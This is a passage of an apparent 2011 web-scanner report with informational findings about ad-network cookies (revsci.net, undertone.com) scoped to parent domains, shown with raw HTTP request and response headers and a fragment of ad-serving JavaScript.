Set-Cookie: rsiPus__KA3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_YeNy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Pk3I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_65qD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wuxR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_l77R=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GQV0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2jdP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7SED=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_o_3Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_PtS0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_p1rh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-lLI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_lfkx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yt-D=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_KhUr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LqXQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Vodh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_r94O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0rr2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RAwv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AHDy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_moDT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7bUe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fGcz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yrpy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Lezd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_UF3V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Axdo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_COzm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OQKV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cwxp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_zAmI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__HnB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AAqA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_s4s1=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_h7Ht=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NJdS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_28kw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_K7cs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oxSr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_itCl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BpAi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BQYd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_CU4b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_mO5c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8TWQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_XcRl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5yEt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2qz2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_m_1v=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-tsc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nw0e=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OxDu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_U7pH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_P5td=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_jRAO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_zbnz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BRXn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Kirp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ccsv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BRp5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NNfV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wN_v=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JOM8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_QJXH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fBja=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tbUz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Gg_Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_J1KA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_DDfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_6jYM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_P2pY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_MKCJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tUnQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yzAv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_E4FI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Fi8O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_h2UP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3Yn9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LKfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BayI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RlWl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GMAx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_tgf7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9Xoj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_J2Ea=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__thJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ny38=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_1tW9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nn6l=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RSEK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OkuD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9izr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Qh75=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AzD0="MLtXrtUvti9nIDH3PvyuJZDWPvAb5rmAROC1vV+97tGjIq0KICE6IXNJpXbbtXk7SFglqytuSSifpijZkG/o9jHBIRbD9dvmp0CQ7vRdyOFH4TmnC/4OArLBdE8Hqi6o6R2PN9CCY2j1ylbdUwMYvE2vn/8yQK49ZcC2BmYHlP5TqASUaNd3SmSsruJoVhwue8QJ2Wq/HYRhwLuv+SBJuvZlzZ8Srsq2sIZOUsy2XdRmTdXJvYqRxcA7T88WNgvlk/lLSPEabgD9zqVd1+fJjSdNkIpDyzWJ1qz4xbxiA5hGMbHmUcIm4ZmDiZQ0lI1uhSsiwQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJT+DPwIU1E3iGYqC+OknDNarDzE9m/tXM2y5OlYSamN+F+xfdu44vAK1LW9qi2ENBLyeepZhpAoNnAZwwWk7okoNeM6hnY4FDeSFdjLp9DlTHNdGEjk0NgfVVxKB0nEnvngZcDTqBTlUIwh2pwKZacn4hm9cIGhFcXIXBU6SBmPbJnKmYxv/0p5EDN4nttB7hb1PTJwj/3mBGjNllA12sUjy7QOOdLxfEl6GmDjn/ZexM7I/fPI8ijGMSHLODlMOfrBlcpc/EVLjRSLRI8xjjkWUcghoozYMgm/2kBMR53HBmxFjQP21MJ6qziGy5KFhz2qPm8ZgoK1+g0XpR3Kmq3TMLtl541XiOq/36oUo4MMjpuSJ2y6bPEnEG4RNytq5QtjHrtihooQg0m/lM9wDkKucEZSkzX6We4wXeCOgPS/A7BkgZy4dkUCe4edTyMDn8fmzBehL604nI2WXe85cUQ528Q14Mxu+aNOLf9YTzBvNBA1KAIjb0O0Oi+VN4FyjgQ40clMB9mqvwoFps3YOlPjPNsS2F22gQ0ivIIHmWn30Wq88O2srD/dCkj0Oq6ZssNV3f5ACcOIA0D6ZRxJO4Y/m8AWjXZYq4CFnEAlfd0xA70nDa0Q06zNeeQaAGZwXSyRBT0sY9Sei6BdID8JWlG406zH6X+6a+fgW0oipqwWFEsM5sQFrrGzszpRAm1U1sBdJZ2TSEDKubr3jIuyeiHnV6czpfJN1f8orwva/UxRbG+LRbtTY2aEs6IY/TFsITJhj8EcKApWf9WLDkqxqP9jKe9KyQx0p8UjOe+FaH0SYBdgFXAEYUAyiJn6mQbIXwpc07tmy/OujBCnSzBh9l3JW67FffY5JV4bQSgkB8PsS+t2xidb1ikY/pSzxxHBee0GB"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:54:35 GMT
Content-Length: 940

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

13.12. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_LRgg="MLtXrENrsF9nIAE6VbsxTYfBrZ+7yXZlgVXaxFRzRrgsYcYN/uRo6Id0hREh+v8Fc2uaokZKJpx2IXRk9Dyfi2c1aOHwzLio/qTPpYwOAxf+gMWWRw/SfZW0XEPOmFgqfwHDvNqdtPLRpDPvktgUQxq/DIIEL8fjYOTDXguU+JUnX8LmFcFTLYjxY+AM+B/tNXVIestR1daPcVjXKw1W/g=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMd5c2g/xMQ7V5vYJPD0C371lz7qzCPyctfVDXpp0hSLiyOnv8o9V31fTGzYVlly8cr+J2K6AddxvkNjEpT97+05FckBCjXgdMoWcJ+ZDwmTcmvYnaIAWGslXxRlOjyV0yAeF49BvV5wpBw+PAcJGEfuZqf4tqqccxTORX1uqAjTGan1Zaz6sFHSlwFp9OFyA4PCX928q9pyfVSQRHvdV31dgthTb9Tyj7QSV2cVknMw9iw649LdmB7mpU66PajssRrBK7SjdCY/Fc73BkSDCyvcG6h+2s3Rt1jQ1ejpGNd69FB3C193XxQSRJf/9mRpMOHWv3eViIHmLFWqfTR/A9H7j8Ukx49aPa+dnzBItPPH3YI0uFs+fk7r+LK0MsXGwZ6wpkhH6IuoSqStg2Aaiv0cH31+GRBoyUfk+adg2PbI3InOF5nzOD+I2/xJydlfQMPtwuA9UYTbCsXIcrSmc67UaV3jvPM+4TXQzLpbyfcpZBKQKB8AYEiR7n1+LKzfrBKhl5y4Sc9k1WiHRpD777eKMmrZeEtBMENXnfe2BlxJcMS4rhLvBKA7Yrct30ge2qHzHI1b2bguElaKc1LSFhqx1hLlZwnMVqJAHyTZDnILEGYiEYpJiilDTMdLfeZkUYBVO+VUbqM9MrKfDS7bhBjMDE4uZ0EqktoLuwbm2/ctzNmKdD+ZCVwx4yJoyJuU9j2tFkezn2g5+nd76Mb2XYD7FOwIdAEw5JNzYOU16pgQ9bX0MN0m4vYcg=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J06575 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="pUMd5U+g/xMULsTCu+k7bfIrtGPDru2phlBoLeuoNfzhcyKV0v4e66ymwRf8sQAvMBtHyphI1d89vppu7+GTtHc81ZviwvzD0+T13dPv5yLdWC026bygOcgoBhWlndX/bqFGkOCQLHNPuGxFg+Rv+WRXlf/Ek1Yq8/wOPJ+T1zi6dv2OfuJEWpRpXdkwStGhjHefgqbGUJOFzgm6lXumZPudI1ur3H6poIG4XN+oq72CN1joRG9rDw4ZCPy3/BgaLnn/4lU70t5qBYPAVhshw8NrWAa2lsyt1g1gM6GKPOCI43TgdZSQilGDhE9IMICiwqhT3mDUXQBudDnXcEYmKXqcwh4KnN8ZpzAOSrJ7WE1pbGslC6X7wFB3pKV9Zsu6NbtMO31FQsuvlRunI5xxPdamEt7kY2EVjzzbmzTVxizSa9b3xlscu70TjKLqDpOaHosGHduftg4Epv+gVSczzkevXFWWxN0u1nnpPNLrbctfQmhfjFwkhwJbWSdFu7ySX1h+93uVK1v9nSO9EF2gdsrOwDU0PNKJ6bdGYIhBHXW2sbJdnlkH/Lfn/PkBEj2Hd9+bo+AJ4s3Oa3OeTgl3fpWZ1OtQVd8AeQsydIoKTtE/3QRuNlF2LV2jsQJHHucIwiETvNABG31SV74cz2jqv5zwiN7yalUwItqZn+d8NZT+50ZO5BxkJPG/UzpQgC3sdoKT8DaY9q4GXrs+cjZSQigz9xi9PGeGDr2RYdV3gmnDLWlv/w=="; udm_0=MLvv8FEJoS9npx4Ednq9YMBs9UFoa0U2h9b6OXFScmalI3t4IfxJSN67yaGjig+eWmkqtj8SzXF4+FJSFwnD3jITRGB3M0Yx9P0nIeSjmJWTu+2Ant8jI058EvH0wiyEJabVhVaTXVQSXwV7CHWoAqOobVyK81IZLoWuX5iT7y3M8ScOMJrBsHg8KYeni5z/E6hkDffwQLF8iPG05ZYtUA0alpaWPIsfSZP09AwQLM4/SgJ1qogzpZ0jrN1odBAf2GHOabJZ2/4wM0E9KajR5b9r7hs8/D8TnAx33g4xWC9OBwrBjlk/nj/WE9jC9AL72Q1kBbW0aVwbUxDtsLsy72TezNYbA9wMR2b4t22vECwG52fwQCCp7YspVUnDU7ZUV1l52zdrMb4YjTBOPHikYQIi6KiPQYghVDCclLvvsPXKTwn7ANcw4uw1QyIILtMe8Q/lzIaPJ05O3JfbFWzgRbe0YqmmAFOP4r8JBDXmcRXJm9lth61wKthFl0nuld0zu0mX5KsXzUQHvihVAnP3goULD8pxYQk0WTzgXLF0RvPvH9Tw2lObtmDphrk7b9pbmIm86p9+zbQ+4UQg+3N4Z/k2caDp4CkFmcHwEglLKqKmuOJUrD9WrWEf

Response

13.13. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_bTBF="MLtXrEVrsC9jIDFi7XZS/nWyofj8uo4h4hQaMt62x2xHbq9QZyFp4272ogDQaLmA/RMWitRUcC8I7G491XGtkTPsKy5HIvJesYX30b0qu8WXX0HfMJuA3FHVw11laB3EptDJ+unN4T4giuXzXvB3z+ILY6CVMUX/pUeIutokG4ey0jUb+KUX7E2rAO9SAXGUST7XghGegzEMIVRrVRs="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJc+g/xMU1j2Eq62Z0x2J+T7ub2bZeJfYPutCNIwrH1XdFM+MZcHDWW+m5pc3ESBNa7QOe8RRbcs+vzlYyzs4bC+hg79E1Ob1LQ6VJ549nOzZ4+iP4Wi0dbjdNk78PtA0kzj4Maf92hlO1TwJIbwH7ceYZq2XEuBQIPh8NTPilkoTvr9B0OSW9k+IVr2JgoC2wApREepSXS7N5rvBsxW+t5Kq427OCNwYVvep0g8pYXD6AbpX0qw21q+XOdKSOVf81dLtfxvZwshBg0hi6tUyaGtMWYZjVdElQ5mthRPt9XB16B7KINYFw7O0HeD6Yq8KwE2Nzf1sqtapfdch022LTR8NRR9ym5qyvR5tiTSm5elpFZGK6dBf9dpyZc5/bu/PK54E9OklB6NzLnEN18dtYmJ4IIhpo2LsNEn47o5vfSRj9fUQYxB3e0hvMnaG8q/Kez3/EStFbUON+caWEHOYg6I6gPVP0XjXs6kw2zzk+sIyceGfLGrE71uyNJ5rkDcNoVkJozvFjTO9cF2gdsr+0DU0PNKJ6bFGYYhBGXS2sTBcntkHvLnvzPkBEj2HdtuZq/gp4s0C6zlnmicnDONgeTv1MPazWgBvj14g5DP1Ia7q96lLrk2jsQJ/PqcBO0uSkDcJAQW95pz2wB7LPAFWbtQD3yldCGsqtAcvJiz2H9OniRUvfvn/wY/Qsuej+dyG0XVuBcDn4MzMokJRG4P66YlpT1ZgLNJI0J000UoJK2C2h77U475C"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=f09828 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; rsiPus_gdim="MLtXrENrsF9nIAF6D3M7i/STKTrao6ps1I2AZRCKRzqmb8KlQQV8QUt2e6OtBgskIhKdoOJ1yHmxJTFNs4gGJaXsDU5PQU6EmolVCb+84ccdyh4mNwNw3VCsrR0XLTokq11VBVXRQRrYd0tfXWhpelt1T+ejBzpqRApnt1cCwfS5wRS+B+A8nIViBS1MMsBx87o2wCOaDxZn61tSbRAX"; rsi_us_1000000="pUMd5U+g/xMULsTCu+k7bfIrtGPDru2phFBoLcuotRc4XqWYdP4FZFSPn4TvSWKjIrkgIpiz0cvt7Mo+v/2z1H1g1ZviwvzD+x4dbnrGATM1gL2PhdqEEa+sdHBRhMjyV6yHOWY9BnX6wmxQOI8cI2AXepuf4tqqccxTORX1+iBjTKam1Zez6sFFSFwFJdMBSf4PD/12c59pybTk4A6b4qH3bYRekZK/dwnHMH6Jn5CXck3Kmb8plgagKY8ulFqjsgRsBK7RjdaZ/FEE3BgSLCyvcG7h46v0Rt1jQ1ejoGNd69FF3C3/3XzQ2GjBVn3Vu/e+kVrsNQpzqBEC4Nbh2DUOoH5j4T65/psqdtFS6mG3LH3xI2XJowjYfFJB7abijveddgKJ6wHDKH3LowpXTPIW3ojUDGE9h81B4tmmh1E/1kZoWgJ6e8NBF/XF6rR9fqxnF+SYjaMAfLagpL9uTZJdcKOUMGqj3ee3f6iebUeQFMLDg9C5fnEY7ix+e3KU/7iAXz+lOrqNjM0Qe4SgiJM1FcpreSWeVN40WhcuYD8YW953i/AGPLioUidu58HRtXATsMaLhWiM3OzVM0KP6BfGEw34vGrocGS8N5RHdEjscsvktTjApMSUv7rioEPhkqeWdvBv07xey/d7mFskiNBIF1C617zy2bnd4IwBvpGmM58OG6d8r4JpbrtmYwlR0N7040FBl09mNhMaNcwncRVxlEwI+vbUQhKvorTH5tt+1q0LGKr56b4L"; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJaaPUzsK/FDxqSYmPYVuquFO/SkW6+13sxsgQpcph2m+fNr7WmfBVr4UDtrpA6HAl9Quf4KbetQtZmgoUly6wQ7sd+KSCvcGhz3F7fYu+DFw; rtc_96sc=MLuBu6yht4kWQAcYCwq3qtH/Je30l0vQIMllZLMTR5d1cXDbc3eX0XFkPieoml1m03ilSbH+UDzM8ahhkwNRJIjsQekY9SHhEfoErML/TD+1N5BDdk6/B/CvX3bhGLQ3s1uvTJFu6bmlGXFRddc7Q88DyqOsfDVBczaNqEk18Dy7B57guB8dm9vx5I0cfvoTdC2UdNz5S6FBXbz04N3YbbmMXAQ6Wt+0OLHhHUU7KFucwXqAEdNCXxVHVGOHllgcS6HqmtQ1oHhumx0AWg==; udm_0=MLv38CMpYS5rpr4czGDsuuqBPWf7KsMz01fKtT610i1pdlCheRf6b9kCVd3v9r3st7cmM0gIRSd7MpaC8NXsZUwtae0IloLFJap/gZi76IGx+cyWgZ6+vZaNGDMnSvgxwwhKNMJOy6lD9QmxLmp5iUQx8Af2+nfHWRw3Tj+fEjeIT1gLVR4j9TpLtxLXx2KLFlkUS2oKqH7ZtWjiRcE89QZ6mDaSm3BdIs7JxqL4J1x1tvBVvnDY7X40IzE2MKgmkLUHZTKwvj5hcWXCYa8pT1xp1DSpkY7CKKmpKlZtSUGfCVTG17N0zTfBLnW6UzMK8Bk6MPI6U8mgMhL95YKdi9yTeJBsRuAlTc/5no/9OF2E1L1sK1fBlux5bis8Nfd68xeTjr/YrzZkSITtmhZcZTrCNMbqKvmHAl1zL0HcIWPYj4HUgtYCzQxBIcl1C+YNyjTcxwRSsPWSCGeeLiADblyxYX895xGaqMMnUz9A8aKCiYIrasqB5hZsEOOBN7qCBIM/ZuyWnsX9TJhRbKUT9pyWYSVlSgGjm812lLduhcCgqtQCBUaCKQStvRjyoEWxqBf43bWAGEcjB2I29FHX46LC3nvj3+dyvlUL3+cRf2Iz97EyGefayWmbEtWoPl8J+oNA7FQfw0/UyOJf0HeKqhQonhcTgoCjrIni/zz6qEMlbyAqQuvk/IcxeDzUj+6d0ebI81e3TsEXs765NURRog8Fct/gRayZz+RnKF+AbF6ZLn4sa0KYqcY+t6xXsxxULAj1hsqmAsSo7K0BzEGzafTMub7EjOe5zRiXelJiWvjCvbJTOyYp4Oxc3A+SpOIqlGa/Unt6ZH5WOhmdktwqaC3rB5O9Oi82i5FALQR+NfEWeQNPbA==; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c

Response

13.14. http://ads.undertone.com/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/ajs.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

A28X=3KIatKzwD8XkgLR4ju6dOBtbo71SiimUay2RivDe9tJHoFAAUgYCSQg; expires=Sun, 02-Oct-2011 00:45:08 GMT; path=/; domain=.undertone.com

